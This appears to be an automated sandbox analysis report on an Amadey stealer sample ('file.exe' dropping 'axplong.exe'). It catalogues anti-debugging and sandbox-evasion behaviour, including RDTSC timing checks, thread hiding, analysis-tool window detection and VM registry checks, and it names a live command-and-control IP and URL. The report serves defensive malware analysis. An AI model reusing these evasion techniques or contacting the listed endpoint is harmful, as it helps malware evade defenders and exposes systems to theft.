Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410872 second address: 5410878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410878 second address: 541087C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0144 second address: 53B0148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0148 second address: 53B014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B014E second address: 53B01AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0B050E2h 0x00000009 or si, 7CB8h 0x0000000e jmp 00007F84B0B050DBh 0x00000013 popfd 0x00000014 jmp 00007F84B0B050E8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 mov esi, 4BC3F7ADh 0x00000025 mov ebx, eax 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b movzx esi, di 0x0000002e mov ebx, 2BAE4092h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B01AF second address: 53B01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B01B3 second address: 53B01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410C0A second address: 5410C3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 67h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov esi, 72E32E7Fh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410C3A second address: 5410CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov ah, 4Ch 0x0000000f popad 0x00000010 push dword ptr [ebp+08h] 0x00000013 jmp 00007F84B0B050E5h 0x00000018 push 89E7DEA1h 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, 6F500E5Eh 0x00000024 movsx edi, cx 0x00000027 popad 0x00000028 pushfd 0x00000029 jmp 00007F84B0B050E0h 0x0000002e adc ch, 00000028h 0x00000031 jmp 00007F84B0B050DBh 0x00000036 popfd 0x00000037 popad 0x00000038 add dword ptr [esp], 76192161h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F84B0B050E5h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410CBC second address: 5410CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410D24 second address: 5410D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5410D29 second address: 5410D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D65602h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DA5D second address: 23DA81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a js 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DC45 second address: 23DC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DC49 second address: 23DC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23DC4F second address: 23DC7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F84B0D655FBh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F84B0D65607h 0x00000014 jmp 00007F84B0D65601h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0657 second address: 53C065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7EB2F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7C276 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2BAAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 46EB2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 46EA4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 46C276 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 6AAAAE instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05410BDB rdtsc 0_2_05410BDB
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1176 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 525 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1230 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1189 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8124 Thread sleep time: -66033s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 Thread sleep count: 1176 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 Thread sleep time: -2353176s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 Thread sleep count: 525 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 Thread sleep time: -15750000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 Thread sleep count: 1230 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 Thread sleep time: -2461230s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7176 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 Thread sleep count: 1189 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 Thread sleep time: -2379189s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: axplong.exe, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000006.00000002.2627219543.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05410BDB rdtsc 0_2_05410BDB
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0043645B mov eax, dword ptr fs:[00000030h] 6_2_0043645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0043A1C2 mov eax, dword ptr fs:[00000030h] 6_2_0043A1C2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: file.exe, 00000000.00000002.1418391064.0000000000213000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1443906022.0000000000603000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: -](Program Manager
Source: axplong.exe Binary or memory string: -](Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0041D312 cpuid 6_2_0041D312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0041CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0041CB1A

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.file.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1443822866.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520516 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 22 Suricata IDS alerts for network traffic 2->22 24 Found malware configuration 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 28 6 other signatures 2->28 6 file.exe 5 2->6         started        10 axplong.exe 12 2->10         started        process3 dnsIp4 16 C:\Users\user\AppData\Local\...\axplong.exe, PE32 6->16 dropped 18 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 6->18 dropped 30 Detected unpacking (changes PE section rights) 6->30 32 Tries to evade debugger and weak emulator (self modifying code) 6->32 34 Tries to detect virtualization through RDTSC time measurements 6->34 13 axplong.exe 6->13         started        20 185.215.113.16, 49711, 49713, 49715 WHOLESALECONNECTIONSNL Portugal 10->20 36 Hides threads from debuggers 10->36 38 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->38 40 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->40 file5 signatures6 process7 signatures8 42 Antivirus detection for dropped file 13->42 44 Multi AV Scanner detection for dropped file 13->44 46 Detected unpacking (changes PE section rights) 13->46 48 6 other signatures 13->48
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.16/Jo89Ku7d/index.php true
    		unknown